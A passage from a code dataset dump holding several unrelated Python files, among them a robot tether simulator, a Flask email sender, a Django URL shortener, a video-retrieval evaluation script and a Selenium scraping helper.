self.rotation + pi*((cone_width/2)/180)\n xy = self.getRange(urange, angle)\n if not xy==False:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n xy.x, xy.y,\n fill=\"gray\",\n dash=(4, 2))\n else:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n self.sensor.x + urange*cos(angle), self.sensor.y+urange*sin(angle),\n fill=\"gray\",\n dash=(4, 2))\n #tether lines############################################\n self.tether.draw(self.canvas)\n Line(self, self.tether.anchors[-1]).draw(self.canvas)\n def redraw_scene(self):\n self.canvas.delete(\"all\")\n for p in self.env:\n p.draw(self.canvas,\"red\")\n xy = self.getUltrasonic()\n if not xy==False:\n xy.draw(self.canvas)\n self.draw()\n self.canvas.update()\n def afterAction(self):\n pass\n def track(self):\n pass\n 
\n\n","repo_name":"bektasaykut/tether","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14725795752","text":"import pygtk\nimport gtk\nimport librarytreeview\nimport playertreeview\nimport eventtreeview\n\nclass LibraryBrowser(gtk.Alignment):\n \n def __event_selection_changed(self, view):\n\n events = self.event_view.get_selected_events()\n \n self.library_view.clear_event_filters()\n \n if events is None:\n return\n \n for event in events:\n self.library_view.filter_event(event[0])\n \n def __player_selection_changed(self, view):\n players = self.player_view.get_selected_players()\n \n self.library_view.clear_player_filters()\n self.event_view.clear_filters()\n \n if players is None:\n return\n \n for player in players:\n self.event_view.filter_player(player[0])\n self.library_view.filter_player(player[0])\n \n def __sw(self, wid):\n sw = gtk.ScrolledWindow()\n sw.add(wid)\n return sw\n \n def __make_event_view(self):\n self.event_view = eventtreeview.EventTreeView()\n self.event_view.get_selection().connect(\"changed\", self.__event_selection_changed)\n return self.__sw(self.event_view)\n \n def __make_library_view(self):\n self.library_view = librarytreeview.LibraryTreeView()\n return self.__sw(self.library_view)\n\n def __make_player_view(self):\n self.player_view = playertreeview.PlayerTreeView()\n \n self.player_view.get_selection().connect(\"changed\", self.__player_selection_changed)\n return self.__sw(self.player_view)\n \n def __pack_widgets(self):\n vbox = gtk.VBox()\n hbox = gtk.HBox()\n \n lv = self.__make_library_view()\n pv = self.__make_player_view()\n ev = self.__make_event_view()\n \n hbox.pack_start(pv,True)\n hbox.pack_start(ev,True)\n \n vbox.pack_start(hbox,True)\n vbox.pack_start(lv,True)\n \n self.add(vbox)\n\n def __init__(self):\n gtk.Alignment.__init__(self)\n self.__pack_widgets()\n self.set(0,0,1,1)\n \n def get_selected_game (self):\n return self.library_view.get_selected_game()\n","repo_name":"strudlez/SDDFall2010--Team-Zamboni","sub_path":"zambogo/src/library/librarybrowser.py","file_name":"librarybrowser.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70034906088","text":"import logging\nimport graphene\nfrom .. 
import api_access\nimport json\nfrom ..model.error_schema import ErrorsSchema\nfrom ..helpers.service_urls_helper import Helpers\n\n\n\nclass UpdateInstallationMutation(graphene.Mutation):\n\n def __init__(self, service_urls, x_user_agent, inputDict):\n self.schemaDict = {}\n self.http_status = None\n self.http_cause = None\n self.http_cause_is_json = False\n\n status, content = api_access.put_installations(service_urls, x_user_agent = x_user_agent, \n \tsecureToken = inputDict['secureToken'], \n \ttimestamp = inputDict['timestamp'], \n \tinstallationId = inputDict['installationId'], \n social_type = inputDict['socialType'],\n social_access_token = inputDict['socialAccessToken'],\n social_email = inputDict['socialEmail'],\n social_id = inputDict['socialId'],)\n if status == 200 or status == 201:\n self.schemaDict = json.loads(content)\n else:\n #error\n self.http_status = status\n try:\n self.http_cause = json.loads(content)\n self.http_cause_is_json = True\n except:\n self.http_cause = content\n\n class Input:\n installationId = graphene.String(required=True)\n secureToken = graphene.String(required=True)\n timestamp = graphene.String(required=True)\n socialType = graphene.String(required=True) \n socialAccessToken = graphene.String(required=True)\n socialEmail = graphene.String(required=True)\n socialId = graphene.String(required=True)\n\n userId = graphene.String() \n def resolve_userId(self, args, context, info):\n return self.schemaDict.get('userId')\n\n installationToken = graphene.String() \n def resolve_installationToken(self, args, context, info):\n return self.schemaDict.get('installationToken')\n\n errors = graphene.Field(ErrorsSchema) \n def resolve_errors(self, args, context, info):\n #logging.info('resolve_errors')\n return ErrorsSchema(self.http_status, self.http_cause, self.http_cause_is_json)\n \n \n def mutate(self, input, context, info):\n input_dict = {'installationId' : input.get('installationId'), \n 'secureToken' : input.get('secureToken'), \n 'timestamp' : input.get('timestamp'), \n 'socialType' : input.get('socialType'), \n 'socialAccessToken' : input.get('socialAccessToken'), \n 'socialEmail' : input.get('socialEmail'),\n 'socialId' : input.get('socialId') } \n return UpdateInstallationMutation(Helpers.get_service_urls(context), context['x_user_agent'], input_dict)","repo_name":"neilmca/gc_graphql","sub_path":"gae_graphql_server/gql/mutations/update_installation_mutation.py","file_name":"update_installation_mutation.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37773688793","text":"import re\nimport string\nimport nltk\nfrom nltk import PerceptronTagger\nfrom nltk.corpus import stopwords\n\ndef clean_text_simple(text, tagger, keep, stpwds, stemmer, remove_stopwords=True, pos_filtering=True, stemming=True):\n # convert to lower case\n text = text.lower()\n # remove punctuation (preserving intra-word dashes)\n tokens = tokenization(text)\n if pos_filtering == True and len(tokens) > 0:\n tokens = pos_tagging(tokens, tagger, keep)\n if remove_stopwords:\n # remove stopwords\n tokens = [token for token in tokens if token not in stpwds]\n if stemming:\n # apply Porter's stemmer\n tokens = map(stemmer.stem, tokens)\n return tokens\n\n\ndef pos_tagging(tokens, tagger, keep):\n # apply POS-tagging\n tagged_tokens = tagger.tag(tokens)\n # retain only nouns and adjectives\n tokens = [item[0] for item in tagged_tokens if item[1] in keep]\n return tokens\n\n\ndef 
tokenization(text):\n punct = string.punctuation.replace('-', '')\n cond = '[' + re.escape(punct) + ']+'\n text = re.sub(cond, ' ', text)\n text = re.sub('(\\s+-|-\\s+)', ' ', text)\n # strip extra white space\n text = re.sub('-{2,}', ' ', text)\n text = re.sub('\\s+', ' ', text)\n # strip leading and trailing white space\n text = text.strip()\n # tokenize (split based on whitespace)\n tokens = text.split(' ')\n tokens = filter(lambda x: len(x) > 0, tokens)\n return tokens\n\n\ndef clean(X, col = 'body', cleaner = clean_text_simple, join = True):\n X_cleaned = X.copy()\n tagger = PerceptronTagger()\n keep = set(['NN', 'NNS', 'NNP', 'NNPS', 'JJ', 'JJS', 'JJR'])\n stpwds = set(stopwords.words('english'))\n stemmer = nltk.stem.PorterStemmer()\n X_cleaned[col] = X_cleaned[col].apply(lambda x: cleaner(x, tagger, keep, stpwds, stemmer))\n if join:\n X_cleaned[col] = X_cleaned[col].apply(lambda x: ' '.join(x))\n return X_cleaned","repo_name":"abyoussef/ALTEGRAD_Challenge","sub_path":"helpers/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44126946995","text":"import base64\nfrom io import BytesIO\nfrom pathlib import Path\n\nfrom .resources.bad_news import bad_news\nfrom .resources.good_news import good_news\n\n\nfrom mahiro import GroupMessageMahiro\n\nbad_news_prefix = '悲报 '\ngood_news_prefix = '喜报 '\n\ndef byte_to_base64(byte: BytesIO):\n return base64.b64encode(byte.getvalue()).decode()\n\ndef byte_save(byte: BytesIO, path: str):\n with open(path, 'wb') as f:\n f.write(byte.getvalue())\n\ncache_dir = Path(__file__).parent / 'cache'\ncache_dir.mkdir(exist_ok=True)\n\nasync def memes(mahiro: GroupMessageMahiro):\n is_text = mahiro.extra.is_text\n if not is_text:\n return\n \n output = None\n msg = mahiro.ctx.msg.Content.strip()\n if msg.startswith(good_news_prefix):\n text = msg.replace(good_news_prefix, '')\n output = good_news(None, [text], None)\n if msg.startswith(bad_news_prefix):\n text = msg.replace(bad_news_prefix, '')\n output = bad_news(None, [text], None)\n if output:\n base64_str = byte_to_base64(output)\n mahiro.sender.send_to_group(\n group_id=mahiro.ctx.groupId,\n fast_image=base64_str\n )","repo_name":"opq-osc/mahiro","sub_path":"python/plugins/memes/memes.py","file_name":"memes.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"3987606213","text":"import torch\nimport utils\nimport argparse\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom datasets.generators import DatasetGenerator\nfrom model.students import FineGrainedStudent, CoarseGrainedStudent\n\n\n@torch.no_grad()\ndef calculate_similarities_to_queries(model, queries, target, args):\n similarities = []\n batch_sz = 2048 if 'batch_sz_sim' not in args else args.batch_sz_sim\n for i, query in enumerate(queries):\n if query.device.type == 'cpu':\n query = query.to(args.gpu_id)\n sim = []\n for b in range(target.shape[0]//batch_sz + 1):\n batch = target[b*batch_sz: (b+1)*batch_sz]\n if batch.shape[0] >= 4:\n sim.append(model.calculate_video_similarity(query, batch))\n sim = torch.mean(torch.cat(sim, 0))\n similarities.append(sim.cpu().numpy())\n return similarities \n \n \n@torch.no_grad()\ndef query_vs_target(model, dataset, args):\n # Create a video generator for the queries\n generator = DatasetGenerator(args.dataset_hdf5, 
\n    loader = DataLoader(generator, num_workers=args.workers, collate_fn=utils.collate_eval)\n\n    # Extract features of the queries\n    all_db, queries, queries_ids = set(), [], []\n    print('\\n> Extract features of the query videos')\n    for video in tqdm(loader):\n        video_features = video[0][0]\n        video_id = video[2][0]\n        if video_id:\n            features = model.index_video(video_features.to(args.gpu_id))\n            if 'load_queries' in args and not args.load_queries:\n                features = features.cpu()\n            all_db.add(video_id)\n            queries.append(features)\n            queries_ids.append(video_id)\n\n    # Create a video generator for the database videos\n    generator = DatasetGenerator(args.dataset_hdf5, dataset.get_database())\n    loader = DataLoader(generator, num_workers=args.workers, collate_fn=utils.collate_eval)\n\n    # Calculate similarities between the queries and the database videos\n    similarities = {query: dict() for query in queries_ids}\n    print('\\n> Calculate query-target similarities')\n    for video in tqdm(loader):\n        video_features = video[0][0]\n        video_id = video[2][0]\n        if video_id:\n            features = model.index_video(video_features.to(args.gpu_id))\n            sims = calculate_similarities_to_queries(model, queries, features, args)\n            all_db.add(video_id)\n            for i, s in enumerate(sims):\n                similarities[queries_ids[i]][video_id] = float(s)\n\n    print('\\n> Evaluation on {}'.format(dataset.name))\n    return dataset.evaluate(similarities, all_db)\n\n\n@torch.no_grad()\ndef queries_vs_database(model, dataset, args):\n    # Create a video generator for the queries\n    generator = DatasetGenerator(args.dataset_hdf5, dataset.get_queries())\n    loader = DataLoader(generator, batch_size=args.batch_sz, num_workers=args.workers, collate_fn=utils.collate_eval)\n\n    # Extract features of the queries\n    all_db, queries, queries_ids = set(), [], []\n    print('\\n> Extract features of the query videos')\n    for video in tqdm(loader):\n        video_id = np.array(video[2])\n        video_features = video[0][video_id != '']\n        video_mask = video[1][video_id != '']\n        video_id = video_id[video_id != '']\n        if len(video_id) > 0:\n            video_features = model.index_video(video_features.to(args.gpu_id), video_mask.to(args.gpu_id))\n            all_db.update(video_id)\n            queries.append(video_features)\n            queries_ids.extend(video_id)\n    queries = torch.cat(queries, 0)\n\n    # Create a video generator for the database videos\n    generator = DatasetGenerator(args.dataset_hdf5, dataset.get_database())\n    loader = DataLoader(generator, batch_size=args.batch_sz, num_workers=args.workers, collate_fn=utils.collate_eval)\n\n    # Extract features of the targets\n    targets, targets_ids = [], []\n    print('\\n> Extract features of the target videos')\n    for video in tqdm(loader):\n        video_id = np.array(video[2])\n        video_features = video[0][video_id != '']\n        video_mask = video[1][video_id != '']\n        video_id = video_id[video_id != '']\n        if len(video_id) > 0:\n            video_features = model.index_video(video_features.to(args.gpu_id), video_mask.to(args.gpu_id))\n            all_db.update(video_id)\n            targets.append(video_features)\n            targets_ids.extend(video_id)\n    targets = torch.cat(targets, 0)\n\n    # Calculate similarities between the queries and the database videos\n    print('\\n> Calculate query-target similarities')\n    sims = model.calculate_video_similarity(queries, targets).cpu().numpy()\n    similarities = {query: dict() for query in queries_ids}\n    for i in range(sims.shape[0]):\n        for j in range(sims.shape[1]):\n            similarities[queries_ids[i]][targets_ids[j]] = float(sims[i, j])\n\n    print('\\n> Evaluation on {}'.format(dataset.name))\n    return dataset.evaluate(similarities, all_db)\n
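\n# Editor's notes (illustrative, not from the original repository): `similarities`\n# is a nested dict of the form {query_id: {target_id: score}}, which is exactly\n# what dataset.evaluate(similarities, all_db) consumes in both functions above.\n# A hypothetical invocation with made-up file names:\n#   python evaluation_student.py --dataset FIVR-5K --dataset_hdf5 fivr_5k_features.hdf5 --student_type coarse-grained\n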
\n\nif __name__ == '__main__':\n    formatter = lambda prog: argparse.ArgumentDefaultsHelpFormatter(prog, max_help_position=80)\n    parser = argparse.ArgumentParser(description='This is the code for the evaluation of the trained student on five datasets.', formatter_class=formatter)\n    parser.add_argument('--dataset', type=str, required=True, choices=[\"FIVR-200K\", \"FIVR-5K\", \"CC_WEB_VIDEO\", \"SVD\", \"EVVE\"],\n                        help='Name of evaluation dataset.')\n    parser.add_argument('--dataset_hdf5', type=str, required=True,\n                        help='Path to hdf5 file containing the features of the evaluation dataset')\n    parser.add_argument('--student_path', type=str, default=None,\n                        help='Path to a trained student network. If it is not provided, then the pretrained weights are used with the default architecture.')\n    parser.add_argument('--student_type', type=str, default='fine-grained', choices=['fine-grained', 'coarse-grained'],\n                        help='Type of the student network.')\n    parser.add_argument('--attention', type=utils.bool_flag, default=False,\n                        help='Boolean flag indicating whether a Fine-grained Attention Student will be used.')\n    parser.add_argument('--binarization', type=utils.bool_flag, default=False,\n                        help='Boolean flag indicating whether a Fine-grained Binarization Student will be used.')\n    parser.add_argument('--batch_sz', type=int, default=32,\n                        help='Number of videos processed in each batch. Applicable only with Coarse-grained Students.')\n    parser.add_argument('--batch_sz_sim', type=int, default=2048,\n                        help='Number of feature tensors in each batch during similarity calculation.')\n    parser.add_argument('--gpu_id', type=int, default=0,\n                        help='ID of the GPU used for the student evaluation.')\n    parser.add_argument('--load_queries', type=utils.bool_flag, default=True,\n                        help='Boolean flag indicating whether the query features will be loaded to the GPU memory. Applicable only for Fine-grained Students.')\n    parser.add_argument('--workers', type=int, default=8,\n                        help='Number of workers used for video loading.')\n    args = parser.parse_args()\n\n    if 'CC_WEB' in args.dataset:\n        from datasets import CC_WEB_VIDEO\n        dataset = CC_WEB_VIDEO()\n    elif 'FIVR' in args.dataset:\n        from datasets import FIVR\n        dataset = FIVR(version=args.dataset.split('-')[1].lower())\n    elif 'EVVE' in args.dataset:\n        from datasets import EVVE\n        dataset = EVVE()\n    elif 'SVD' in args.dataset:\n        from datasets import SVD\n        dataset = SVD()\n\n    print('\\n> Loading network')\n    if args.student_path is not None:\n        d = torch.load(args.student_path, map_location='cpu')\n        student_args = d['args']\n        if student_args.student_type == 'fine-grained':\n            model = FineGrainedStudent(**vars(student_args))\n            eval_function = query_vs_target\n        elif student_args.student_type == 'coarse-grained':\n            model = CoarseGrainedStudent(**vars(student_args))\n            eval_function = queries_vs_database\n        model.load_state_dict(d['model'])\n    else:\n        if args.student_type == 'fine-grained':\n            if not args.attention and not args.binarization:\n                raise Exception('No pretrained network for the given inputs. Provide either `--attention` or `--binarization` as true to use a pretrained fine-grained student.')
\n            model = FineGrainedStudent(attention=args.attention,\n                                       binarization=args.binarization,\n                                       pretrained=True)\n            eval_function = query_vs_target\n        elif args.student_type == 'coarse-grained':\n            model = CoarseGrainedStudent(pretrained=True)\n            eval_function = queries_vs_database\n    model = model.to(args.gpu_id)\n    model.eval()\n\n    print(model)\n\n    eval_function(model, dataset, args)\n","repo_name":"mever-team/distill-and-select","sub_path":"evaluation_student.py","file_name":"evaluation_student.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"53"} +{"seq_id":"33039869828","text":"import os\nimport sys\nsys.path.append(os.path.abspath(os.curdir))\n\nfrom yuan_api.inspurai import Yuan, set_yuan_account, Example\n\n# 1. set account\n# set_yuan_account(\"账号\", \"手机号\")  # enter the account and phone number you applied for\n\n# 2. initiate yuan api\n# Note: engine must be one of ['base_10B', 'translate', 'dialog', 'rhythm_poems']; 'base_10B' is the base model, 'translate' the translation model, 'dialog' the dialogue model, and 'rhythm_poems' the classical-text model\nyuan = Yuan(engine='base_10B',\n            input_prefix=\"内容:\",\n            input_suffix=\"\",\n            output_prefix=\"文章标题:\",\n            output_suffix=\"。\",\n            topK=5,\n            temperature=0.1,\n            max_tokens=30,\n            topP=0.6,\n            append_output_prefix_to_query=False)\n\n# 3. add examples if needed.\nyuan.add_example(Example(inp=\"截至5月27日,今年西部陆海新通道海铁联运班列开行3173列,累计约15.9万标箱,同比增长33%,完成上半年开行3150列的阶段性任务目标,提前1个月完成“双过半”任务。今年前4月,RCEP成员国经西部陆海新通道发运22111标箱,占通道到发总运量17.6%,外贸到发运量51482标箱,同比增长58.5%。\",\n                         out=\"西部陆海新通道海铁联运班列提前完成上半年目标任务。\"))\n\nprint(\"====摘要生成====\")\n\nwhile True:\n    print(\"输入Q退出\")\n    prompt = input(\"内容:\")\n    if prompt.lower() == \"q\":\n        break\n    response = yuan.submit_API(prompt=prompt, trun=\"。\")\n    print(response + \"。\")\n","repo_name":"Shawn-Inspur/Yuan-1.0","sub_path":"yuan_api/examples/abstraction_gen.py","file_name":"abstraction_gen.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"zh","doc_type":"code","stars":588,"dataset":"github-code","pt":"53"} +{"seq_id":"70544358568","text":"from flask import Flask, request\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\napp = Flask(__name__)\n\nserver = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n\nserver_username = \"aadeshmailtester@gmail.com\"\nserver_password = \"\"\n\n@app.route('/')\ndef hello_world():\n    return \"Hello World\"\n\n@app.route('/emails', methods=[\"POST\"])\ndef get_mail():\n    request_data = request.get_json(force=True)\n    try:\n        to = request_data[\"to\"]\n        subject = request_data[\"subject\"]\n        body = request_data[\"body\"]\n    except KeyError:\n        return \"Please check the json object\"\n\n    if len(to) == 0:\n        return \"Please check the receiver mail address\"\n\n    bodyTrail = \"\"\"\\
\n    <html>\n      <head></head>\n      <body>\n        <p>\n          %s<br>\n        </p>\n        <p>\n          Regards<br>\n        </p>\n        <p>\n          Aadesh Agarwal<br>\n        </p>\n        <p>\n          MEng Student at Virginia Tech<br>\n          Computer Science<br>\n          Fall 2023<br>\n          LinkedIn<br>\n          GitHub\n        </p>\n      </body>\n    </html>\n    \"\"\" % (body.capitalize())\n\n    message = MIMEMultipart(\"alternative\")\n    message['From'] = \"Future Intern - Task Complete\"\n    message['To'] = to\n    message['Subject'] = subject.capitalize()\n    message.attach(MIMEText(body, 'plain'))\n    message.attach(MIMEText(bodyTrail, 'html'))\n\n    server.login(server_username, server_password)\n\n    server.sendmail(server_username, to, message.as_string())\n\n    return \"Please Check your Inbox\"\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"aadesh-agarwal8888/mailsender","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25084431550","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\n\nfrom .models import LongURL\nimport random\n\nletter = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n\ndef generate_code():\n    code = []\n    for _ in range(8):\n        character = random.choice(letter) + str(random.randint(0, 9))\n        code.insert(random.randint(0, len(code)), random.choice(character))\n    return ''.join(code)\n\ndef index(request):\n    if request.method == 'POST':\n        long_url = LongURL()\n        long_url.url = request.POST['url']\n        long_url.code = generate_code()\n        long_url.save()\n        return render(request, \"info.html\", {\"long_url\": long_url})\n    return render(request, \"redirector.html\")\n\ndef redirect(request, code):\n    long_url = LongURL.objects.get(code=code)\n    return HttpResponseRedirect(long_url.url)\n","repo_name":"graytoli/pdxcode_labs","sub_path":"django_projects/django-url-shortener/redirector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25446839107","text":"from flask import Flask, jsonify, request\nfrom flask_mysqldb import MySQL\nfrom app import *\n\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'echange_culturel_fsbm'\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\n\nmysql = MySQL(app)\n\n# Route to fetch all events\n@app.route('/events', methods=['GET'])\ndef get_events():\n    cur = mysql.connection.cursor()\n    cur.execute(\"SELECT * FROM events\")\n    events = cur.fetchall()\n    cur.close()\n    return jsonify(events)\n\n# Route to add a new event\n@app.route('/events/add', methods=['POST'])\ndef add_event():\n    title = request.json['title']\n    description = request.json['description']\n    date = request.json['date']\n    location = request.json['location']\n\n    cur = mysql.connection.cursor()\n    cur.execute(\"INSERT INTO events (title, description, date, location) VALUES (%s, %s, %s, %s)\",\n                (title, description, date, location))\n    mysql.connection.commit()\n    cur.close()\n\n    return jsonify({'message': 'Événement ajouté avec succès'})\n\n# Route to confirm an event\n@app.route('/events/confirm/<int:event_id>', methods=['POST'])\ndef confirm_event(event_id):\n    cur = mysql.connection.cursor()\n    cur.execute(\"UPDATE events SET isConfirmed = 1 WHERE id = %s\", (event_id,))\n    mysql.connection.commit()\n    cur.close()\n\n    return jsonify({'message': 'Confirmation réussie'})\n
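\n# Editor's note (illustrative values, not from the original): the /events/filter\n# route below expects a JSON body such as\n#   {\"start_date\": \"2024-01-01\", \"end_date\": \"2024-12-31\"}\n# whose two values feed the parameterized BETWEEN query.\n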
cur.execute(\"SELECT * FROM events WHERE date BETWEEN %s AND %s\", (start_date, end_date))\n filtered_events = cur.fetchall()\n cur.close()\n\n return jsonify(filtered_events)\n\n# Route pour supprimer un événement\n@app.route('/events/delete/', methods=['DELETE'])\ndef delete_event(event_id):\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM events WHERE id = %s\", (event_id,))\n mysql.connection.commit()\n cur.close()\n\n return jsonify({'message': 'Événement supprimé avec succès'})\n\n# Route pour modifier un événement\n@app.route('/events/edit/', methods=['PUT'])\ndef edit_event(event_id):\n title = request.json['title']\n description = request.json['description']\n date = request.json['date']\n location = request.json['location']\n\n cur = mysql.connection.cursor()\n cur.execute(\"UPDATE events SET title = %s, description = %s, date = %s, location = %s WHERE id = %s\",\n (title, description, date, location, event_id))\n mysql.connection.commit()\n cur.close()\n\n return jsonify({'message': 'Événement modifié avec succès'})\n\n","repo_name":"ikrameezzirague/back-end-echange-culturel-fsbm","sub_path":"events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74296444007","text":"#!/usr/bin/env python3\n\nimport pytest\nimport os\n\n@pytest.mark.order(4)\ndef test_copy_video():\n \"\"\"Duplicate file /tmp/pilapse-test/image2vid.mp4 2 times\"\"\"\n\n if not os.path.isfile('/tmp/pilapse-test/image2vid.mp4'):\n pytest.skip(\"No process video file found\")\n\n workDir = '/tmp/pilapse-test'\n\n import shutil\n source = os.path.join(workDir, 'image2vid.mp4')\n\n for dupName in ['dup1', 'dup2']:\n shutil.copyfile(source, os.path.join(workDir, f\"image2vid-{dupName}.mp4\"))\n\n\n@pytest.mark.order(5)\ndef test_merge_video():\n \"\"\"Merge 2 above duplicated videos\"\"\"\n\n workDir = '/tmp/pilapse-test'\n video1 = os.path.join(workDir, 'image2vid-dup1.mp4')\n video2 = os.path.join(workDir, 'image2vid-dup2.mp4')\n\n if not (os.path.isfile(video1) and os.path.isfile(video2)):\n pytest.skip(\"Not enough duplicated video files found\")\n\n from moviepy.editor import VideoFileClip, concatenate_videoclips\n\n video1 = VideoFileClip(video1)\n video2 = VideoFileClip(video2)\n merged = concatenate_videoclips([video1, video2])\n merged.write_videofile(os.path.join(workDir, 'merged.mp4'))","repo_name":"git-akihakune/pilapse","sub_path":"tests/remote/unit/test_mergevideo.py","file_name":"test_mergevideo.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14631304064","text":"from pathlib import Path\n\n\ndef parse_input(inp: str) -> list[list[str]]:\n lines = inp.split(\"\\n\")\n return [line.split()[-4:] for line in lines]\n\n\ndef filter_1478(digs: list[str]) -> list[str]:\n return [dig for dig in digs if len(dig) in {2, 3, 4, 7}]\n\n\ndef solve(inp: str) -> int:\n digits = parse_input(inp)\n filtered_digits = list(map(filter_1478, digits))\n return sum(map(len, filtered_digits))\n\n\nif __name__ == \"__main__\":\n path = Path(__file__).parents[1] / \"inputs\" / \"day_08.txt\"\n\n with open(path) as f:\n inp = f.read().strip()\n\n 
print(solve(inp))\n","repo_name":"fabio-reale/aoc-solutions","sub_path":"2021/python/day_08a.py","file_name":"day_08a.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72413153769","text":"import RPi.GPIO as GPIO\n\nfrom log_lib import log\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n\ndef set_pin(pin_id, value):\n    GPIO.setup(pin_id, GPIO.OUT)\n    log(f\" Pin {pin_id} set to {value}\")\n    GPIO.output(pin_id, value)\n","repo_name":"SergeNov/sprinkler","sub_path":"gpio_lib.py","file_name":"gpio_lib.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20673485225","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport time\n\ntry:\n    from src.utils import cprint\n    from src.utils import o_fmt_error\nexcept ImportError:\n    from utils import cprint\n    from utils import o_fmt_error\n\nclass Driver:\n    def __init__(self, browser=\"chrome\", driver_path=r'drivers/', results_path='results/similarweb/'):\n        \"\"\"\n        Initializes the Driver object with the given browser (Chrome by default).\n\n        Args:\n            browser (str): The browser to use: 'chrome', 'firefox', or 'edge'.\n        \"\"\"\n\n        # Attributes\n        self.driver_path = driver_path\n        self.results_path = results_path\n        self.browser = browser\n        self.html_content = ''\n\n    def __del__(self):\n        \"\"\"\n        Destructor that closes the browser when the instance is released.\n        \"\"\"\n        self.close_driver()\n\n    def open_driver(self):\n        \"\"\"\n        Opens the Selenium driver for the configured browser.\n        \"\"\"\n        try:\n            if self.browser == \"chrome\":\n                # Disable USB device scanning noise\n                chrome_options = webdriver.ChromeOptions()\n                chrome_options.add_argument(\"--disable-usb-device-detection\")\n                chrome_options.add_experimental_option('excludeSwitches', ['enable-logging'])  # this is the one that actually works\n                # Open the driver\n                self.driver = webdriver.Chrome(\n                    os.path.join(self.driver_path, 'chromedriver.exe'),\n                    options = chrome_options\n                )\n            elif self.browser == \"firefox\":\n                self.driver = webdriver.Firefox(os.path.join(self.driver_path, 'chromedriver.exe'))\n            elif self.browser == \"edge\":\n                self.driver = webdriver.Edge(os.path.join(self.driver_path, 'chromedriver.exe'))\n            else:\n                raise ValueError(\"Invalid browser: must be 'chrome', 'firefox' or 'edge'.\")
\n        except Exception as e:\n            msg = f\"Error opening the browser: {e}\"\n            cprint(msg)\n            o_fmt_error('0001', msg, 'Class__Driver')\n\n    def close_driver(self):\n        \"\"\"\n        Closes the browser and finishes the Driver instance.\n        \"\"\"\n        try:\n            self.driver.quit()\n        except Exception as e:\n            msg = f'There is no driver to close\\n{e}'\n            cprint(msg)\n            o_fmt_error('0002', msg, 'Class__Driver')\n\n    def open_url(self, url):\n        \"\"\"\n        Loads a web page in the browser.\n\n        Args:\n            url (str): The URL of the page to load.\n        \"\"\"\n        try:\n            self.driver.get(url)\n        except Exception as e:\n            msg = f\"Error loading the URL: {e}\"\n            cprint(msg)\n            o_fmt_error('0003', msg, 'Class__Driver')\n\n    def update_html_content(self):\n        self.html_content = self.driver.page_source\n\n    def save_html_content(self, filename=\"scraped_page.html\"):\n        try:\n            # Save the HTML content\n            with open(filename, \"w\", encoding=\"utf-8\") as file:\n                file.write(self.driver.page_source)\n            cprint(f'\\t--> HTML content saved into {filename}')\n        except Exception as e:\n            msg = f\"Error while saving HTML content to the file {filename}\\nError code: {e}\"\n            cprint(msg)\n            o_fmt_error('0004', msg, 'Class__Driver')\n\n    def save_html_after_delay(self, delay=5, filename=\"scraped_page.html\"):\n        \"\"\"\n        Waits for the given delay and then saves the page HTML to a file.\n\n        Args:\n            delay (int): The wait time in seconds before saving the HTML (5 seconds by default).\n            filename (str): The name of the file the HTML will be saved to (\"scraped_page.html\" by default).\n        \"\"\"\n        # Refresh the cached HTML content\n        self.update_html_content()\n\n        # Wait for the requested time\n        time.sleep(delay)\n\n        # Save the HTML content\n        self.save_html_content(filename=filename)\n\n    def save_html_after_find(self, timeout=30, filename=\"scraped_page.html\"):\n\n        try:\n            # Define a maximum wait time\n            wait = WebDriverWait(self.driver, timeout)\n\n            # Wait until the element with class \"app-section__content\" appears\n            elemento = wait.until(\n                EC.presence_of_element_located((By.CLASS_NAME, 'app-section__content'))\n            )\n\n            # Once the element is present, get its HTML content\n            contenido_html = 